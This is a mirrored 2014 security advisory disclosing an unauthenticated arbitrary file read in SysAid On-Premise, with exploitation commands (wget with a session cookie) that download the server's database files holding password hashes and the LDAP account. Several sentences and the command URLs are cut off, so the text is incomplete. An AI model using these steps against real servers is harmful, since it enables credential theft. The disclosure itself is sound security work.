VP-2014-004 SysAid Server Arbitrary File Disclosure

From: Bernhard Mueller <bernhard@vantagepoint.sg>
To: bugtraq@securityfocus.com
Subject: VP-2014-004 SysAid Server Arbitrary File Disclosure

Vantage Point Security Advisory 2014-004

Title: SysAid Server Arbitrary File Disclosure
ID: VP-2014-004
Vendor: SysAid
Affected Product: SysAid On-Premise
Affected Versions: < 14.4.2
Product Website: http://www.sysaid.com/product/sysaid
Author: Bernhard Mueller <bernhard[at]vantagepoint[dot]sg>

SysAid Server is vulnerable to an unauthenticated file disclosure
attack that allows an anonymous attacker to read arbitrary files on
the system. An attacker exploiting this issue can compromise SysAid
user accounts and gain access to important system files. When SysAid
is configured to use LDAP authentication it is possible to gain read
access to the entire Active Directory or obtain domain admin


How to download SysAid server database files containing usernames and
password hashes (use any unauthenticated session ID):

wget -O "ilient.mdf" --header="Cookie:
JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \

wget -O "ilient.ldf" --header="Cookie:
JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \

The dowloaded MSSQL files contain the LDAP user account and encrypted
password used to access the Active Directory (SysAid encrypts the
password with a static key that is the same for all instances of the

Fix Information:

Upgrade to version 14.4.2.


2014/11/14: Issue reported
2014/12/22: Patch available and installed by client

About Vantage Point Security:

Vantage Point Security is the leading provider for penetration testing
and security advisory services in Singapore. Clients in the Financial,
Banking and Telecommunications industries  select Vantage Point
Security based on technical competency and a proven track record to
deliver significant and measurable improvements in their security

Web: https://www.vantagepoint.sg/
Contact: office[at]vantagepoint[dot]sg

Copyright © 1995-2019 LinuxRocket.net. All rights reserved.